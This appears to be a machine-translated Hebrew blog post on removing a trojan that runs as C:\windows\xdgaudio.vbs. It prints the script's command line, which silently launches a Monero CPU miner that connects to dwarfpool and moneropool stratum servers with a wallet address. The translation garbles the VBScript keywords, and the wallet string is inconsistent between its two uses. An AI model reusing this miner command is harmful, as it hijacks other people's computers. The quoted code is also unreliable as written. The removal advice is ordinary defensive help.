אם אתה מקבל את הודעת השגיאה הבאה הקשורה ל-"xdgaudio.vbs" במערכת שלך, סביר להניח שהמחשב שלך נגוע.
סקריפט: C:\windows\xdgaudio.vbs
שורה: 3
צ'אר: 1
שגיאה: המערכת לא יכולה למצוא את הקובץ שצוין.
קוד: 80070002
מקור: (null)
בעת עריכה עם פנקס רשימות, הסקריפט עשוי להכיל שורות כמו להלן:
עמום WShell. הגדר WShell = CreateObject("WScript. צדף") WShell. הפעל את "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv. אפליקציה -p x -k -o stratum+tcp://mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJRk7bSyBzQJR -p x", 0. הגדר WShell = כלום
זה בהחלט נראה כמו טרויאני CPU / cryptocurrency Miner אשר לא רק מאט את המחשב שלך, אלא גם יכול להוות איום אבטחה. קבצי הסקריפט c:\windows\xdgaudio.vbs ו c:\windows\servicecrsssr.vbs צריך להימחק. זה לא מספיק. הפעל סריקה יסודית באמצעות Malwarebytes Antimalware, וגם סרוק עם תוכנת האנטי-וירוס שבה אתה משתמש.
להנחיות מפורטות על הסרת כורה טרויאני כזה, עיין במדריך malwaretips.com כיצד להסיר CPU Miner Trojan מ-Windows (מדריך עזרה לווירוסים).
בקשה קטנה אחת: אם אהבתם את הפוסט הזה, בבקשה שתפו אותו?
נתח "קטנטן" אחד ממך יעזור ברצינות לצמיחת הבלוג הזה. כמה הצעות נהדרות:- להצמיד אותו!
- שתף אותו בבלוג האהוב עליך + פייסבוק, Reddit
- צייץ את זה!